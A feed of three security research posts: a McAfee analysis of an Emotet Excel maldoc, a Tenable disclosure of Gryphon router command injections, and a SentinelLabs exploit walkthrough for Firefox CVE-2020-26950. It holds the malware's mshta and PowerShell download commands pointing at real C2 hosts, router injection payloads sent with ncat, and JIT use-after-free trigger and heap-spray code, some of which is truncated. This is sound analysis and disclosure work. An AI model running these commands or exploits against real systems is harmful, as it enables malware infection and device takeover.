To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.


zodiacon

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP addresses, which are usually written in decimal format. Examples of this are shown below:

Hexadecimal format: 0xb907d607 (decimal equivalent: 185.7.214.7)

Octal format: 0056.0151.0121.0114 (decimal equivalent: 46.105.81.76)
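These spellings work because standard address-parsing routines accept hexadecimal and octal components. The following minimal C sketch (illustrative only, not taken from the maldoc) uses the classic inet_addr() routine to show that all of the forms above resolve to ordinary dotted-decimal addresses.

// Hedged illustration only: inet_addr() accepts decimal, octal (leading 0) and
// hexadecimal (leading 0x) components, so the obfuscated forms parse just fine.
// Compile on Windows and link against ws2_32.lib.
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

int main(void)
{
    const char *spellings[] = {
        "0xb907d607",             // hexadecimal form from the maldoc
        "0056.0151.0121.0114",    // octal form from the maldoc
        "185.7.214.7"             // plain decimal for comparison
    };

    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    for (int i = 0; i < 3; i++) {
        struct in_addr addr;
        addr.s_addr = inet_addr(spellings[i]);   // parses all three notations
        printf("%-22s -> %s\n", spellings[i], inet_ntoa(addr));
    }

    WSACleanup();
    return 0;
}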

This change in format might evade some AV products that rely on command-line parameters, but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the Excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically, resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in the hexadecimal and octal variants of the maldocs:

FORMAT      | OBFUSCATED CMD                                               | DEOBFUSCATED CMD
Hexadecimal | cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html         | http://185[.]7[.]214[.]7/fer/fer.html
Octal       | cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html  | http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript, which is embedded within an HTML file.

Figure 4: Process tree of excel execution

The downloaded file fer.html, containing the malicious JavaScript, is encoded with HTML Guardian to obfuscate the code.

Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line: (New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png')

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server.

cmd line: cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE     | VALUE                                                             | SCANNER                              | DETECTION NAME
XLS      | 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c | McAfee LiveSafe and Total Protection | X97M/Downloader.nn
DLL      | a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 | McAfee LiveSafe and Total Protection | Emotet-FSY
HTML URL | http://185[.]7[.]214[.]7/fer/fer.html, http://46[.]105[.]81[.]76/c.html | WebAdvisor                     | Blocked
DLL URL  | http://185[.]7[.]214[.]7/fer/fer.png, http://46[.]105[.]81[.]76/cc.png  | WebAdvisor                     | Blocked

MITRE ATT&CK

TECHNIQUE ID | TACTIC                            | TECHNIQUE DETAILS                               | DESCRIPTION
T1566        | Initial access                    | Phishing attachment                             | Initial maldoc uses phishing strings to convince users to open the maldoc
T1204        | Execution                         | User Execution                                  | Manual execution by user
T1071        | Command and Control               | Standard Application Layer Protocol             | Attempts to connect through HTTP
T1059        | Command and Scripting Interpreter | Starts CMD.EXE for commands execution           | Excel uses cmd and PowerShell to execute command
T1218        | Signed Binary Proxy Execution     | Uses RUNDLL32.EXE and MSHTA.EXE to load library | rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.


Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = "/sbin/configure_repeater.sh " .. "\"" .. ssid .. "\"" .. " " .. "\"" .. key .. "\"" .. " " .. "\"" .. hidden .. "\"" .. " " .. "\"" .. ssid5 .. "\"" .. " " .. "\"" .. key5 .. "\"" .. " " .. "\"" .. mssid .. "\"" .. " " .. "\"" .. mkey .. "\"" .. " " .. "\"" .. gssid .. "\"" .. " " .. "\"" .. gkey .. "\"" .. " " .. "\"" .. ghidden .. "\"" .. " " .. "\"" .. country .. "\"" .. " " .. "\"" .. bssid .. "\"" .. " " .. "\"" .. board .. "\"" .. " " .. "\"" .. wpa .. "\""
  os.execute(cmd)
  os.execute("touch /etc/rc_in_progress.txt")
  os.execute("/sbin/mark_router.sh 2 &")
  luci.http.header("Access-Control-Allow-Origin","*")
  luci.http.prepare_content("application/json")
  luci.http.write("{\"rc\": \"OK\"}")
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, we string together commands using wget to grab a Python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format: {"<operationNumber>" : {"<op parameter 1>":"param 1 value", ...}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of ";id>/tmp/op41" would result in the output of the id command being written to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {"41":{"cmd":";id>/tmp/op41"}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo '{"41":{"cmd":";id>/tmp/op41"}}' | ncat --ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i < 10) {
		return i + 1;
	}
	return i + 2;
}

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.
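As a small sketch of the two cases (the property and function names here are made up for illustration):

// Two loads with no intervening store: both loads share the same dependency,
// so the second one is redundant and can be eliminated.
function readOnly(o) {
    let a = o.prop;
    let b = o.prop; // eliminated
    return a + b;
}

// A store sits between the loads: the second load now depends on (aliases
// with) the Store node and must be kept.
function readWriteRead(o) {
    let a = o.prop;
    o.prop = a + 1; // Store node
    let b = o.prop; // not redundant, must be re-read
    return a + b;
}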

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.
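From script this laziness is invisible, but a sketch of when the work actually happens looks like this (the comments describe the engine-side behaviour):

function f() {} // a fresh JSFunction; no 'prototype' property exists yet

// The first access resolves the property lazily: the engine defines
// 'prototype', adds it to the function's shape, and writes the new object
// into the function's slots array.
let p = f.prototype;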

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.
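Putting these pieces together, the rough shape of a trigger looks like the sketch below (a simplified version of the jitme function shown later; it assumes cons is a JSFunction whose lazy prototype has not been resolved yet and whose slots array has no free space left):

function trigger(cons) {
    cons.x1 = 1;  // property access emits MSlots; the slots pointer is cached

    new cons();   // JSOp::New -> createThisScripted -> MCallGetProperty,
                  // which lazily defines 'prototype' and reallocates the
                  // (full) slots array

    cons.x0 = 2;  // still goes through the cached, now-freed slots pointer
}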

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f) or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straightforward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.
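As an illustration (the 500 below is just an assumed count comfortably above the 256-slot threshold; the exploit code later uses values in the same range):

// Give an object enough named properties that its slots array is allocated
// in the tenured heap as a jemalloc "Large" allocation rather than in the
// nursery.
let obj = {};
for (let i = 0; i < 500; i++) { // assumed count, illustration only
    obj["p" + i] = i;
}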

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Since our corruption lives in the tenured heap, however, the ArrayBuffer object itself is out of reach: it is allocated in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and has thus created a separate arena for it:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
